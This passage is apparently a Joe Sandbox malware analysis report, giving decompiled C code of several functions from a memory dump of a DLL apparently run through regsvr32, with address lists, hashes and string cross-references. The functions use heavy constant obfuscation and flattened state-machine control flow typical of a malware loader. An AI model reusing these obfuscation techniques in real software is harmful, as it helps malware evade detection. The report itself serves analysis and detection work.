				_t228 = _t227 + 0x210;
				_v8 = _v8 + 0xffffd526;
				_v8 = _v8 + 0xffff9aef;
				_t232 = 0xe;
				_v8 = _v8 / _t232;
				_v8 = _v8 ^ 0x00158a9c;
				_v52 = 0x6d4b81;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 | 0x9473135e;
				_v52 = _v52 ^ 0x947983d4;
				_v48 = 0x1b14da;
				_v48 = _v48 ^ 0x3b80be00;
				_v48 = _v48 ^ 0x31fc21b5;
				_v48 = _v48 ^ 0x0a66b0ac;
				_v44 = 0xd47319;
				_v44 = _v44 + 0xb0f0;
				_v44 = _v44 + 0x91e0;
				_v44 = _v44 ^ 0x00dddf09;
				_v72 = 0xcbf856;
				_v72 = _v72 + 0xffffde46;
				_v72 = _v72 ^ 0x00c32966;
				_v60 = 0x8f9dfa;
				_v60 = _v60 | 0x3b312785;
				_v60 = _v60 ^ 0xef6dd428;
				_v60 = _v60 ^ 0xd4d4de7d;
				_v56 = 0xc03f76;
				_v56 = _v56 ^ 0xb11f3c45;
				_v56 = _v56 | 0x5007a846;
				_v56 = _v56 ^ 0xf1d86d70;
				_v32 = 0xa30334;
				_v32 = _v32 + 0xffffbd8f;
				_v32 = _v32 << 2;
				_v32 = _v32 + 0x1565;
				_v32 = _v32 ^ 0x028ffa9f;
				_v28 = 0x377022;
				_t233 = 0x25;
				_v28 = _v28 * 0x52;
				_v28 = _v28 + 0x9cdf;
				_v28 = _v28 * 0xf;
				_v28 = _v28 ^ 0x0a6e821b;
				_v20 = 0x4db97b;
				_v20 = _v20 * 0xf;
				_v20 = _v20 | 0xd6da98c3;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xf7bdeb74;
				_v16 = 0xf9abbd;
				_v16 = _v16 + 0x8e3e;
				_v16 = _v16 / _t233;
				_v16 = _v16 | 0x315ace4a;
				_v16 = _v16 ^ 0x315a03f3;
				_v12 = 0x4abc67;
				_t234 = 0x21;
				_v12 = _v12 / _t234;
				_v12 = _v12 + 0xffff263c;
				_v12 = _v12 ^ 0xb579bebd;
				_v12 = _v12 ^ 0xb5708aa7;
				_v68 = 0x9cef99;
				_v68 = _v68 ^ 0x702c3364;
				_v68 = _v68 ^ 0x70b8d782;
				_v24 = 0x7a1b2f;
				_v24 = _v24 >> 6;
				_t235 = 3;
				_v24 = _v24 * 0x27;
				_v24 = _v24 + 0xffffc75b;
				_v24 = _v24 ^ 0x004f9c30;
				_v40 = 0xceeba0;
				_v40 = _v40 + 0xfffff2fb;
				_v40 = _v40 / _t235;
				_v40 = _v40 ^ 0x00400176;
				_v36 = 0x93266b;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 << 0x10;
				_v36 = _v36 | 0x20a206d5;
				_v36 = _v36 ^ 0x24b0eaf1;
				_v64 = 0x36bcda;
				_v64 = _v64 + 0x3abe;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x00134fff;
				do {
					while(_t205 != 0x6d9e84) {
						if(_t205 == 0x15bca09) {
							_push(4);
							_t210 = 0x10;
							_t237 = E1000D763(_t210);
							_push(_t237);
							_push(_v40);
							_push(_t228);
							E1001DF4E(1, _v24);
							_t238 = _t238 - 0xc + 0x1c;
							_t231 = _t228 + _t237 * 2;
							_t205 = 0x8e72992;
							_t201 = 0x2e;
							 *_t231 = _t201;
							_t228 = _t231 + 2;
							continue;
						}
						if(_t205 == 0x5670c69) {
							_t201 = E1000F2B9();
							_t205 = 0x6d9e84;
							continue;
						}
						if(_t205 != 0x8e72992) {
							goto L10;
						}
						_push(3);
						_push(_v64);
						_push(_t228);
						E1001DF4E(1, _v36);
						 *((short*)(_t228 + 6)) = 0;
						return 0;
					}
					_push(4);
					_t206 = 0x10;
					_t191 = E1000D763(_t206);
					_push(1);
					_push(_v56);
					_t236 = _t191;
					_push(_t228);
					_t207 = 2;
					E1001DF4E(_t207, _v60);
					_push(_t236);
					_push(_v28);
					_t229 = _t228 + 2;
					_push(_t229);
					E1001DF4E(1, _v32);
					_t238 = _t238 - 0xc + 0x28;
					_t230 = _t229 + _t236 * 2;
					_t205 = 0x15bca09;
					_t194 = 0x5c;
					 *_t230 = _t194;
					_t228 = _t230 + 2;
					L10:
				} while (_t205 != 0xcaf60a1);
				return _t201;
			}

0x1001dade
0x1001dae4
0x1001daeb
0x1001daf0
0x1001daf7
0x1001db00
0x1001db06
0x1001db0d
0x1001db13
0x1001db1a
0x1001db26
0x1001db2b
0x1001db30
0x1001db37
0x1001db3e
0x1001db42
0x1001db49
0x1001db50
0x1001db57
0x1001db5e
0x1001db65
0x1001db6c
0x1001db73
0x1001db7a
0x1001db81
0x1001db88
0x1001db8f
0x1001db96
0x1001db9d
0x1001dba4
0x1001dbab
0x1001dbb2
0x1001dbb9
0x1001dbc0
0x1001dbc7
0x1001dbce
0x1001dbd5
0x1001dbdc
0x1001dbe3
0x1001dbe7
0x1001dbee
0x1001dbf5
0x1001dc00
0x1001dc03
0x1001dc06
0x1001dc11
0x1001dc14
0x1001dc1b
0x1001dc26
0x1001dc29
0x1001dc30
0x1001dc34
0x1001dc3b
0x1001dc42
0x1001dc50
0x1001dc53
0x1001dc5a
0x1001dc61
0x1001dc6b
0x1001dc6e
0x1001dc71
0x1001dc78
0x1001dc7f
0x1001dc86
0x1001dc8d
0x1001dc96
0x1001dc9d
0x1001dca4
0x1001dcae
0x1001dcaf
0x1001dcb2
0x1001dcb9
0x1001dcc0
0x1001dcc7
0x1001dcd3
0x1001dcd6
0x1001dcdd
0x1001dce4
0x1001dce8
0x1001dcec
0x1001dcf3
0x1001dcfa
0x1001dd01
0x1001dd08
0x1001dd0b
0x1001dd12
0x1001dd12
0x1001dd24
0x1001dd75
0x1001dd7c
0x1001dd82
0x1001dd86
0x1001dd87
0x1001dd8e
0x1001dd8f
0x1001dd94
0x1001dd97
0x1001dd9a
0x1001dda1
0x1001dda2
0x1001dda5
0x00000000
0x1001dda5
0x1001dd2c
0x1001dd5d
0x1001dd62
0x00000000
0x1001dd62
0x1001dd34
0x00000000
0x00000000
0x1001dd3a
0x1001dd3c
0x1001dd44
0x1001dd46
0x1001dd50
0x00000000
0x1001dd50
0x1001ddb9
0x1001ddc0
0x1001ddc1
0x1001ddc6
0x1001ddc8
0x1001ddce
0x1001ddd0
0x1001ddd3
0x1001ddd4
0x1001ddd9
0x1001ddda
0x1001dde2
0x1001dde6
0x1001dde7
0x1001ddec
0x1001ddef
0x1001ddf2
0x1001ddf9
0x1001ddfa
0x1001ddfd
0x1001de00
0x1001de00
0x00000000

Strings

"p7, xrefs: 1001DBF5
d3,p, xrefs: 1001DC8D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "p7$d3,p
API String ID: 0-3833263543
Opcode ID: 58bbb742e89960f601512edebc0e0f840d0e7e6a984c43fa4b5fc71694957a21
Instruction ID: a236f86d57733e7f274549083c3ad1512932b0d9898188bce4692a9daf686e8d
Opcode Fuzzy Hash: 58bbb742e89960f601512edebc0e0f840d0e7e6a984c43fa4b5fc71694957a21
Instruction Fuzzy Hash: 82917575D00309EBCF58EFA5D98A5DEBBB1FF44324F20815AE502BA260D3B45A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10010097 Relevance: 2.7, Strings: 2, Instructions: 188
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10010097(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* __ecx;
				void* _t181;
				void* _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				void* _t208;
				intOrPtr* _t222;
				void* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_push(_t222);
				_push(__edx);
				E10009E7D(_t181);
				_v12 = 0x78ea5a;
				_t223 = 0;
				_v4 = _v4 & 0;
				_t226 =  &(( &_v92)[4]);
				_v8 = 0xc89636;
				_v60 = 0xadf19d;
				_t208 = 0x8e40361;
				_v60 = _v60 | 0xdfaff76f;
				_v60 = _v60 ^ 0xdfaff7fe;
				_v68 = 0x36b780;
				_v68 = _v68 >> 7;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 + 0xffff4259;
				_v68 = _v68 ^ 0xffff4258;
				_v84 = 0xdf941;
				_v84 = _v84 << 0x10;
				_v84 = _v84 + 0xffff6e4a;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x80dc9400;
				_v24 = 0x106503;
				_v24 = _v24 | 0x116cff73;
				_v24 = _v24 ^ 0x11740cec;
				_v28 = 0xd89f08;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0x4f8e45a3;
				_v80 = 0xaffda0;
				_v80 = _v80 + 0xd725;
				_t203 = 0x36;
				_v80 = _v80 * 0x16;
				_v80 = _v80 << 4;
				_v80 = _v80 ^ 0xf32183e6;
				_v32 = 0x2abc8;
				_t204 = 0x34;
				_v32 = _v32 / _t203;
				_v32 = _v32 ^ 0x0008464d;
				_v88 = 0x92c4c9;
				_v88 = _v88 >> 8;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x39b63787;
				_v88 = _v88 ^ 0x39b01006;
				_v64 = 0xcad2b6;
				_v64 = _v64 | 0x151e37d0;
				_v64 = _v64 / _t204;
				_v64 = _v64 ^ 0x006243e6;
				_v92 = 0x832617;
				_v92 = _v92 << 0x10;
				_v92 = _v92 << 0x10;
				_v92 = _v92 << 9;
				_v92 = _v92 ^ 0x000348cf;
				_v20 = 0xc14ace;
				_v20 = _v20 << 0xd;
				_v20 = _v20 ^ 0x295af6ce;
				_v76 = 0xa7c36c;
				_v76 = _v76 << 0xb;
				_v76 = _v76 >> 9;
				_v76 = _v76 | 0xa50d6a6a;
				_v76 = _v76 ^ 0xa51082cb;
				_v36 = 0x9e3a50;
				_t205 = 0x14;
				_v36 = _v36 / _t205;
				_v36 = _v36 + 0xffffb603;
				_v36 = _v36 ^ 0x0004e0ac;
				_v40 = 0x84829a;
				_v40 = _v40 * 0x59;
				_v40 = _v40 ^ 0xef46a063;
				_v40 = _v40 ^ 0xc1572bea;
				_v44 = 0xadb718;
				_v44 = _v44 ^ 0xd4c4abb4;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0006db22;
				_v72 = 0x2f771e;
				_v72 = _v72 * 0x2d;
				_v72 = _v72 + 0xf497;
				_v72 = _v72 + 0x6fa7;
				_v72 = _v72 ^ 0x085fdbaf;
				_v48 = 0x635184;
				_v48 = _v48 * 0x71;
				_v48 = _v48 << 2;
				_v48 = _v48 ^ 0xaf5a5952;
				_v52 = 0x5c8d38;
				_v52 = _v52 << 8;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 ^ 0x000dc32a;
				_v56 = 0x7daffe;
				_v56 = _v56 << 1;
				_v56 = _v56 * 0x14;
				_v56 = _v56 ^ 0x13aea16d;
				while(_t208 != 0x2912229) {
					if(_t208 == 0x8e40361) {
						_t208 = 0xbe65c26;
						continue;
					} else {
						if(_t208 == 0x9e3f403) {
							_push(_t208);
							_t223 = E1001EAA3(_v16);
							if(_t223 != 0) {
								_t208 = 0x2912229;
								continue;
							}
						} else {
							if(_t208 != 0xbe65c26) {
								L11:
								if(_t208 != 0x6a4891e) {
									continue;
								}
							} else {
								_t202 = E10017394(0, _v24, _v28, _v80, _t208, _a8, _v60, _v32,  &_v16, _v84, _v88, _v64, _t208, _v92);
								_t226 =  &(_t226[0xc]);
								if(_t202 != 0) {
									_t208 = 0x9e3f403;
									continue;
								}
							}
						}
					}
					return _t223;
				}
				E10017394(_t223, _v36, _v40, _v44, _t208, _a8, _v68, _v72,  &_v16, 0, _v48, _v52, _t208, _v56);
				_t226 =  &(_t226[0xc]);
				 *_t222 = _v16;
				_t208 = 0x6a4891e;
				goto L11;
			}

0x1001009e
0x100100a2
0x100100a6
0x100100a7
0x100100a9
0x100100ae
0x100100b6
0x100100b8
0x100100bc
0x100100bf
0x100100c9
0x100100d1
0x100100d6
0x100100de
0x100100e6
0x100100ee
0x100100f3
0x100100f8
0x10010100
0x10010108
0x10010110
0x10010115
0x1001011d
0x10010122
0x1001012a
0x10010132
0x1001013a
0x10010142
0x1001014a
0x1001014f
0x10010157
0x1001015f
0x1001016e
0x10010171
0x10010175
0x1001017a
0x10010182
0x10010190
0x10010191
0x10010197
0x1001019f
0x100101a7
0x100101ac
0x100101b0
0x100101b8
0x100101c0
0x100101c8
0x100101d8
0x100101dc
0x100101e4
0x100101ec
0x100101f1
0x100101f6
0x100101fb
0x10010203
0x1001020b
0x10010210
0x10010218
0x10010220
0x10010225
0x1001022a
0x10010232
0x1001023c
0x10010248
0x10010255
0x10010259
0x10010261
0x10010269
0x10010276
0x1001027a
0x10010282
0x1001028a
0x10010292
0x1001029a
0x1001029f
0x100102a7
0x100102b4
0x100102b8
0x100102c0
0x100102c8
0x100102d0
0x100102dd
0x100102e1
0x100102e6
0x100102ee
0x100102f6
0x100102fb
0x10010300
0x10010308
0x10010310
0x10010319
0x1001031d
0x10010325
0x10010333
0x100103b0
0x00000000
0x10010335
0x10010337
0x10010398
0x100103a2
0x100103a7
0x100103a9
0x00000000
0x100103a9
0x10010339
0x1001033f
0x10010402
0x10010408
0x00000000
0x00000000
0x10010345
0x1001037c
0x10010381
0x10010386
0x1001038c
0x00000000
0x1001038c
0x10010386
0x1001033f
0x10010337
0x10010417
0x10010417
0x100103ec
0x100103f8
0x100103fb
0x100103fd
0x00000000

Strings

Zx, xrefs: 100100AE
Cb, xrefs: 100101DC

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Zx$Cb
API String ID: 0-4094691541
Opcode ID: bb3fedf8b616fe652104f9520a6556b96150730ab3c526844768f3bc39beb8f5
Instruction ID: 6de2fe28c93137e863d44d9bad8fc19520c26fa157a64645fd2e5a86f4890daf
Opcode Fuzzy Hash: bb3fedf8b616fe652104f9520a6556b96150730ab3c526844768f3bc39beb8f5
Instruction Fuzzy Hash: 3591FD711093819BD759CF61D98941FFBE1FBC4B88F505A1CF2A69A220D3B6CA48CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10004342 Relevance: 2.7, Strings: 2, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10004342(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t121;
				signed int _t144;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t153;
				signed int* _t181;
				void* _t183;
				void* _t184;

				_t180 = _a8;
				_t181 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t121);
				_v96 = 0x809c19;
				_t184 = _t183 + 0x10;
				_t153 = 0x36b5e9e;
				_t147 = 6;
				_v96 = _v96 / _t147;
				_v96 = _v96 + 0xa665;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0x000b0adf;
				_v104 = 0xacad41;
				_v104 = _v104 | 0x93f42d34;
				_v104 = _v104 + 0xfffffed9;
				_v104 = _v104 + 0x7814;
				_v104 = _v104 ^ 0x93f45f80;
				_v72 = 0x3b0a8b;
				_t148 = 0x21;
				_v72 = _v72 * 0x45;
				_v72 = _v72 ^ 0x0fea6182;
				_v88 = 0xe5a26e;
				_v88 = _v88 << 0xf;
				_v88 = _v88 / _t148;
				_v88 = _v88 ^ 0x0658855e;
				_v68 = 0x58320e;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x2c1b686c;
				_v80 = 0x5d8e66;
				_v80 = _v80 + 0xfffffd6f;
				_v80 = _v80 + 0x70ec;
				_v80 = _v80 ^ 0x005f5db6;
				_v64 = 0xbb3cb1;
				_v64 = _v64 + 0xffff93e2;
				_v64 = _v64 ^ 0x00b4265c;
				_v84 = 0xdb2f12;
				_v84 = _v84 >> 2;
				_v84 = _v84 | 0xd853047f;
				_v84 = _v84 ^ 0xd8722a46;
				_v100 = 0x62fa7a;
				_v100 = _v100 | 0x1db461e1;
				_t149 = 0x4d;
				_v100 = _v100 / _t149;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x9f8cfc8f;
				_v76 = 0x1c6160;
				_v76 = _v76 + 0xea65;
				_t150 = 0x6d;
				_v76 = _v76 / _t150;
				_v76 = _v76 ^ 0x00047274;
				_v92 = 0x2c9ade;
				_v92 = _v92 | 0xd851e244;
				_v92 = _v92 + 0x874e;
				_v92 = _v92 | 0xbbbbe571;
				_v92 = _v92 ^ 0xfbfe19fb;
				while(_t153 != 0x20bfbe5) {
					if(_t153 == 0x36b5e9e) {
						_t153 = 0xc9a0f96;
						 *_t181 =  *_t181 & 0x00000000;
						_t181[1] = _v96;
						continue;
					} else {
						if(_t153 == 0xbcd68d1) {
							E10006BDB( *((intOrPtr*)(_t180 + 4)), _v80,  &_v60, _v64);
							_t184 = _t184 + 8;
							_t153 = 0xd590b4d;
							continue;
						} else {
							if(_t153 == 0xc9a0f96) {
								_t181[1] = E10001930(_t180);
								_t153 = 0xebcc00e;
								continue;
							} else {
								if(_t153 == 0xd590b4d) {
									E10004627(_v84, _t180 + 0x28, __eflags, _v100,  &_v60);
									_t153 = 0x20bfbe5;
									continue;
								} else {
									if(_t153 == 0xea0c763) {
										E10004603(_v88, _v68, _t181,  &_v60);
										_t153 = 0xbcd68d1;
										continue;
									} else {
										if(_t153 != 0xebcc00e) {
											L16:
											__eflags = _t153 - 0xf8d3e54;
											if(__eflags != 0) {
												continue;
											}
										} else {
											_push(_t153);
											_t144 = E1001EAA3(_t181[1]);
											 *_t181 = _t144;
											if(_t144 != 0) {
												_t153 = 0xea0c763;
												continue;
											}
										}
									}
								}
							}
						}
					}
					__eflags =  *_t181;
					_t120 =  *_t181 != 0;
					__eflags = _t120;
					return 0 | _t120;
				}
				E10004627(_v76, _t180 + 0x38, __eflags, _v92,  &_v60);
				_t153 = 0xf8d3e54;
				goto L16;
			}

0x10004349
0x10004350
0x10004352
0x10004353
0x1000435a
0x1000435b
0x1000435c
0x10004361
0x10004369
0x10004372
0x1000437e
0x10004383
0x10004389
0x10004391
0x10004395
0x1000439d
0x100043a5
0x100043ad
0x100043b5
0x100043bd
0x100043c5
0x100043d2
0x100043d5
0x100043d9
0x100043e1
0x100043e9
0x100043f6
0x100043fa
0x10004402
0x1000440a
0x1000440f
0x10004417
0x1000441f
0x10004427
0x1000442f
0x10004437
0x1000443f
0x10004447
0x1000444f
0x10004457
0x1000445c
0x10004464
0x1000446c
0x10004474
0x10004480
0x10004485
0x1000448b
0x10004490
0x10004498
0x100044a0
0x100044ac
0x100044b4
0x100044b8
0x100044c0
0x100044c8
0x100044d0
0x100044d8
0x100044e0
0x100044e8
0x100044fa
0x100045bf
0x100045c1
0x100045c4
0x00000000
0x10004500
0x10004506
0x100045a9
0x100045ae
0x100045b1
0x00000000
0x1000450c
0x1000450e
0x1000458c
0x1000458f
0x00000000
0x10004510
0x10004516
0x10004574
0x1000457b
0x00000000
0x10004518
0x1000451a
0x10004556
0x1000455d
0x00000000
0x1000451c
0x10004522
0x100045e8
0x100045e8
0x100045ee
0x00000000
0x00000000
0x10004528
0x10004530
0x10004534
0x10004539
0x1000453e
0x10004544
0x00000000
0x10004544
0x1000453e
0x10004522
0x1000451a
0x10004516
0x1000450e
0x10004506
0x100045f6
0x100045fb
0x100045fb
0x10004602
0x10004602
0x100045dc
0x100045e3
0x00000000

Strings

e, xrefs: 100044A0
p, xrefs: 10004427

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: e$p
API String ID: 0-2941589540
Opcode ID: cc6756525dee4c7a2ad156cf71029e3487d9bf1c1452f290b34ad5ec0bec2973
Instruction ID: 3dd3c7f3669db6fed8b7a753dcc0fe890712ed863b61d2ac507ba32085cd492f
Opcode Fuzzy Hash: cc6756525dee4c7a2ad156cf71029e3487d9bf1c1452f290b34ad5ec0bec2973
Instruction Fuzzy Hash: 226196B1508341AFD3A8CF10C88592FBBE1FF88398F514A1DF59A96260DB71DA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 10009B80 Relevance: 2.7, Strings: 2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10009B80(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t150;
				intOrPtr _t163;
				signed int _t164;
				void* _t169;
				intOrPtr _t183;
				signed int _t184;
				signed int _t185;
				signed int* _t189;

				_t167 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t150);
				_v16 = 0xb8a326;
				_t183 = 0;
				_v12 = 0x44bb59;
				_t189 =  &(( &_v80)[6]);
				_v8 = 0x49837b;
				_v4 = 0;
				_t169 = 0xf88ebb0;
				_v32 = 0xfb13bb;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x000000f9;
				_v80 = 0xc93ca1;
				_v80 = _v80 | 0xbab6e830;
				_t184 = 7;
				_v80 = _v80 * 0x51;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00055fce;
				_v52 = 0x346c;
				_v52 = _v52 ^ 0x8960dee9;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x48960ea8;
				_v72 = 0x251306;
				_v72 = _v72 + 0xffff3c85;
				_v72 = _v72 + 0xffff1d92;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 ^ 0x0000011b;
				_v48 = 0xde4091;
				_v48 = _v48 << 3;
				_v48 = _v48 * 5;
				_v48 = _v48 ^ 0x22b3dc69;
				_v68 = 0xb306bd;
				_v68 = _v68 >> 9;
				_v68 = _v68 << 4;
				_v68 = _v68 << 6;
				_v68 = _v68 ^ 0x016f9b32;
				_v36 = 0x6bef9d;
				_v36 = _v36 | 0x1c3a318d;
				_v36 = _v36 ^ 0x1c70f672;
				_v76 = 0x50cebb;
				_v76 = _v76 / _t184;
				_v76 = _v76 >> 9;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0003b905;
				_v40 = 0xc9cb71;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x0001ab01;
				_v24 = 0x686c8f;
				_v24 = _v24 ^ 0xba5ea97e;
				_v24 = _v24 ^ 0xba313e99;
				_v60 = 0x6431cb;
				_v60 = _v60 ^ 0x078675d2;
				_v60 = _v60 * 0x56;
				_v60 = _v60 ^ 0xa60e319a;
				_v64 = 0x9bd7ac;
				_v64 = _v64 + 0xffffcb1d;
				_v64 = _v64 * 0x1d;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x1700ac5b;
				_v28 = 0xa748f5;
				_v28 = _v28 | 0xc6c3898c;
				_v28 = _v28 ^ 0xc6e579b6;
				_v56 = 0x61657e;
				_v56 = _v56 | 0x8839dd95;
				_v56 = _v56 + 0xffffc10b;
				_t185 = 0xf;
				_v56 = _v56 / _t185;
				_v56 = _v56 ^ 0x0915ac47;
				_v20 = 0xd0009b;
				_v20 = _v20 | 0x0bbd7d2f;
				_v20 = _v20 ^ 0x0bf48d18;
				_t186 = _v20;
				_v44 = 0x18f155;
				_v44 = _v44 * 0x58;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00085bbb;
				do {
					while(_t169 != 0x14ea231) {
						if(_t169 == 0x26e8f33) {
							_t164 = E1001BF1C(_v48, _v32, _v68, _v36, _v72, _v76, _a8, _v80, _t169, _t169, _v52, _v40);
							_t186 = _t164;
							_t189 =  &(_t189[0xa]);
							if(_t164 != 0xffffffff) {
								_t169 = 0x14ea231;
								continue;
							}
						} else {
							if(_t169 == 0x9b24a7b) {
								E1001E373(_v56, _t186, _v20, _v44);
							} else {
								if(_t169 != 0xf88ebb0) {
									goto L9;
								} else {
									_t169 = 0x26e8f33;
									continue;
								}
							}
						}
						L12:
						return _t183;
					}
					_t163 = E1001454E(_t186,  *_t167,  *((intOrPtr*)(_t167 + 4)), _v24, _v60, _t167 + 4, _t169, _v64, _v28);
					_t189 =  &(_t189[7]);
					_t183 = _t163;
					_t169 = 0x9b24a7b;
					L9:
				} while (_t169 != 0xadad1a5);
				goto L12;
			}

0x10009b84
0x10009b8b
0x10009b8c
0x10009b90
0x10009b94
0x10009b98
0x10009b99
0x10009b9a
0x10009b9f
0x10009ba7
0x10009ba9
0x10009bb1
0x10009bb4
0x10009bbe
0x10009bc2
0x10009bc7
0x10009bcf
0x10009bd4
0x10009bdc
0x10009be4
0x10009bf3
0x10009bf4
0x10009bf8
0x10009bfd
0x10009c05
0x10009c0d
0x10009c15
0x10009c1a
0x10009c22
0x10009c2a
0x10009c32
0x10009c3a
0x10009c3f
0x10009c47
0x10009c4f
0x10009c59
0x10009c5d
0x10009c65
0x10009c6d
0x10009c72
0x10009c77
0x10009c7c
0x10009c84
0x10009c8c
0x10009c94
0x10009c9c
0x10009caa
0x10009cae
0x10009cb3
0x10009cb8
0x10009cc0
0x10009cc8
0x10009ccd
0x10009cd5
0x10009cdd
0x10009ce5
0x10009ced
0x10009cfd
0x10009d0a
0x10009d0e
0x10009d16
0x10009d1e
0x10009d2b
0x10009d2f
0x10009d34
0x10009d3c
0x10009d44
0x10009d4c
0x10009d56
0x10009d63
0x10009d6b
0x10009d79
0x10009d7c
0x10009d80
0x10009d88
0x10009d90
0x10009d98
0x10009da0
0x10009da4
0x10009db1
0x10009db5
0x10009dba
0x10009dc2
0x10009dc2
0x10009dcc
0x10009e13
0x10009e18
0x10009e1a
0x10009e20
0x10009e22
0x00000000
0x10009e22
0x10009dce
0x10009dd4
0x10009e6c
0x10009dda
0x10009de0
0x00000000
0x10009de2
0x10009de2
0x00000000
0x10009de2
0x10009de0
0x10009dd4
0x10009e73
0x10009e7c
0x10009e7c
0x10009e41
0x10009e46
0x10009e49
0x10009e4b
0x10009e50
0x10009e50
0x00000000

Strings

l4, xrefs: 10009C05
~ea, xrefs: 10009D56

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: l4$~ea
API String ID: 0-3377841115
Opcode ID: 6023dc4ffb0fd843cbcbd06ecc8d7c14d9df4fcbe473c542cc8ba900eaa66bff
Instruction ID: 78592a7a347d092114833c207e6331962242553d12fa77884b169505c64dd02a
Opcode Fuzzy Hash: 6023dc4ffb0fd843cbcbd06ecc8d7c14d9df4fcbe473c542cc8ba900eaa66bff
Instruction Fuzzy Hash: 3F711EB14093419FD358DF25C98A41BBBE1FBC9798F404A0DF6A696260C3B1CA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10007599 Relevance: 2.6, Strings: 2, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10007599(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t93;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t135;
				void* _t136;

				_t129 = _a8;
				_t109 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t93);
				_v92 = 0xda4ccc;
